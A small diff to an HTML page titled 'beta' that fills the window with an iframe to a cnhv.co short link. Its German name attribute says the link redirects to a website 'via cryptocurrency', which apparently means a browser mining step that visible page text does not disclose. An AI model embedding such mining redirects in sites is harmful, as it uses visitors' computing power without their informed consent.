--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <html><head><title>beta</title></head><body>
 	
-	<iframe src="https://cnhv.co/1lhns" border="0" name="Weiterleitung zu Webseite (durch Kryptowährung)" scrolling="no" width="97%" height="99%">
+	<iframe src="https://cnhv.co/1lhns" overflow:"hidden" frameborder="0" name="Weiterleitung zu Webseite (durch Kryptowährung)" scrolling="no" width="97%" height="99%">
 		<p>Dein Browser unterstützt keine Iframes! Gelange hier zur Webseite: </p><a href="https://cnhv.co/1lhns">*click*</a>
 	</iframe>
 	
